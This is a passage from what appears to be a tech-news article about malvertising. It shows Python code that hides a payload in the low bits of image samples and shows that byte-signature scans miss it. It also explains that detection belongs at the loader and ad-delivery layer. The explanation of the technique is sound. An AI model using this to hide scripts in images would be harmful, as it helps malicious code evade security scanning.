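    bits = ((byte >> (7 - i)) & 1 for byte in data for i in range(8))
    for idx, bit in enumerate(bits):
        out[idx] = (out[idx] & 0xFE) | bit
    return bytes(out)


def extract(stego):
    """Read the length header, then that many bytes, from the LSBs."""
    def read_bytes(offset_bits, n):
        buf = bytearray()
        for b in range(n):
            value = 0
            for i in range(8):
                value = (value << 1) | (stego[offset_bits + b * 8 + i] & 1)
            buf.append(value)
        return bytes(buf)

    length = int.from_bytes(read_bytes(0, 4), "big")
    return read_bytes(32, length)


def max_sample_delta(cover, stego):
    """Largest per-sample change introduced by embedding (1 for pure LSB)."""
    return max(abs(a - b) for a, b in zip(cover, stego))


def payload_visible(blob, payload):
    """Naive signature check: does the payload appear contiguously in the bytes?"""
    return payload in blob


if __name__ == "__main__":
    stego = embed(COVER, PAYLOAD)
    print("recovered:", extract(stego) == PAYLOAD)
    print("max sample delta:", max_sample_delta(COVER, stego))
    print("payload visible to a byte-signature scan:", payload_visible(stego, PAYLOAD))
    print("capacity (bytes):", capacity_bytes(COVER))
```

The same property that defeats the signature scan is what makes this detectable elsewhere: the image itself is inert, so the malicious behaviour lives in the loader that fetches it and reconstructs the script from sample bits. Detection therefore belongs at the delivery layer (which ad creative shipped a script that reads pixel data and evaluates the result, and from which network) rather than in scanning the asset's bytes.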

And it did all this undetected for over a bloody year. We guess the lesson here is to trust in security companies and not to click on links that don't look kosher.

Easier said than done. µ